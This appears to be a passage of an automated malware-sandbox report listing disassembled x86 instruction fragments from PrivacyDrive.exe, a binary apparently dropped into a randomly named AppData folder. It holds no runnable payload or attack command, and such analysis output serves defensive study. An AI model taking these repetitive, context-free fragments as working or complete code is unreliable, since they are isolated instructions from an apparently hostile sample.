    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-34h]4_2_00FA5D92
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h4_2_00FCBD62
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]4_2_00FC0EF0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, ebp4_2_00F8BEE2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, ebp4_2_00F8BEE2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]4_2_00FB3ED2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah4_2_00FCBED2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov edi, dword ptr [ebp-3Ch]4_2_00FAFEC1
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [edi], al4_2_00FB4E2D
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_00FC4E22
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [edi], al4_2_00FB4E18
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]4_2_00FB0E11
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_00FCBFE2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]4_2_00FB3EB7
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]4_2_00FB3F33
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx edx, byte ptr [ecx+eax]4_2_051AF7B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h4_2_051EA1E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]4_2_051D2531
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]4_2_051D24B5
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_051EA5E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [edi], al4_2_051D3419
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]4_2_051CF40F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [edi], al4_2_051D342B
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_051E3420
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]4_2_051D24D0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah4_2_051EA4D0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov edi, dword ptr [ebp-3Ch]4_2_051CE4C2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]4_2_051DF4EE
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, ebp4_2_051AA4E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, ebp4_2_051AA4E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-18h]4_2_051CB6CC
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-54h]4_2_051C0730
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-18h]4_2_051CB732
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]4_2_051B4611
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]4_2_051B460A
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]4_2_051E1100
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [edi], al4_2_051D314A
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov edi, eax4_2_051A7170
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then jmp ecx4_2_051DF160
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h4_2_051BF193
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov word ptr [esi], ax4_2_051BF193
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then jmp eax4_2_051B61F2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h4_2_051B60F1
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h4_2_051EA360
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-34h]4_2_051C4390
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]4_2_051D03B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]4_2_051C83A5
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]4_2_051B33DB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]4_2_051A5D10
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]4_2_051CED6D
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]4_2_051CED6D
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov word ptr [eax], cx4_2_051E9C10
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh4_2_051CBC50
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh4_2_051CBC50
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_051C8C90
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]4_2_051A4CB0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h4_2_051BDCC2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]4_2_051B0F0F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov dword ptr [esp], 00000000h4_2_051BAF50
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]4_2_051B3FA9
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+28h]4_2_051B3FA9
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then push ebx4_2_051BDE33
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_051E7E30
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh4_2_051E7E30
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov edi, ecx4_2_051B3EA6
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h4_2_051C6910
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]4_2_051B399C
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh4_2_051E49F0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al4_2_051D2813
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al4_2_051D2813
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh4_2_051E3870
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al4_2_051D2899
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al4_2_051D2899
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx ebx, byte ptr [edx]4_2_051DA880
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]8_2_00F86013
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]8_2_00F8600C
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx edx, byte ptr [ecx+eax]8_2_00F811B2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-18h]8_2_00F9D0CE
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-54h]8_2_00F92132
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-18h]8_2_00F9D134
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_00FB12FC
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h8_2_00FB12FC
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_00FBC2B2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_00FA429B
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_00FA429B
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx ebx, byte ptr [edx]8_2_00FAC282
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh8_2_00FB5272
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_00FA4215
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_00FA4215
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh8_2_00FB63F2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]8_2_00F8539E
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h8_2_00F98312
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h8_2_00F874E1
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]8_2_00F7F4B2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, 0000000Bh8_2_00FA54B5
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx ebp, word ptr [edi]8_2_00FB0432
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-54h]8_2_00F92403
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+00000744h]8_2_00FA45CB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [edi], al8_2_00FA45CB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_00FA45CB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-54h]8_2_00F925AE
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov word ptr [eax], cx8_2_00F98582
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_00F9F577
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h8_2_00F8F6C4
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]8_2_00F766B2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_00F9A692
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh8_2_00F9D652
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh8_2_00F9D652
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov word ptr [eax], cx8_2_00FBB612
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]8_2_00FA076F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]8_2_00FA076F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]8_2_00F77712
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov edi, ecx8_2_00F858A8
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_00FB9832
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh8_2_00FB9832
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then push ebx8_2_00F8F835
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]8_2_00F859AB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+28h]8_2_00F859AB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov dword ptr [esp], 00000000h8_2_00F8C952
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]8_2_00F82911
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h8_2_00F87AF3
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then jmp eax8_2_00F87BF4
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h8_2_00FBBBE2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h8_2_00F90B95
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov word ptr [esi], ax8_2_00F90B95
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov edi, eax8_2_00F78B72
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then jmp ecx8_2_00FB0B62
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [edi], al8_2_00FA4B4C
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]8_2_00FB2B02
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]8_2_00F84DDD
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]8_2_00FA1DB2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]8_2_00F99DA7
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-34h]8_2_00F95D92
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h8_2_00FBBD62
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]8_2_00FB0EF0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, ebp8_2_00F7BEE2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, ebp8_2_00F7BEE2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]8_2_00FA3ED2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah8_2_00FBBED2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov edi, dword ptr [ebp-3Ch]8_2_00F9FEC1
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [edi], al8_2_00FA4E2D
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_00FB4E22
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [edi], al8_2_00FA4E18
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]8_2_00FA0E11
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_00FBBFE2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]8_2_00FA3EB7
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]8_2_00FA3F33
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h8_2_0121A1E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx edx, byte ptr [ecx+eax]8_2_011DF7B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]8_2_01211100
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then jmp ecx8_2_0120F160
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [edi], al8_2_0120314A
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov edi, eax8_2_011D7170
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h8_2_011EF193
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov word ptr [esi], ax8_2_011EF193
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then jmp eax8_2_011E61F2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h8_2_011E60F1
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h8_2_0121A360
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-34h]8_2_011F4390
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]8_2_012003B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]8_2_011F83A5
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]8_2_011E33DB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]8_2_01202531
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]8_2_012024B5
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_0121A5E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_01213420
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [edi], al8_2_0120342B
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]8_2_011FF40F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [edi], al8_2_01203419
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]8_2_0120F4EE
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov edi, dword ptr [ebp-3Ch]8_2_011FE4C2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]8_2_012024D0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah8_2_0121A4D0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, ebp8_2_011DA4E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, ebp8_2_011DA4E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-18h]8_2_011FB6CC
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-18h]8_2_011FB732
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-54h]8_2_011F0730
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]8_2_011E4611
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]8_2_011E460A
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h8_2_011F6910
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]8_2_011E399C
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh8_2_012149F0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_01202813
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_01202813
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh8_2_01213870
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_0121A8B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx ebx, byte ptr [edx]8_2_0120A880
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_01202899
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_01202899
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_0120F8FA
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h8_2_0120F8FA
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_011FDB75
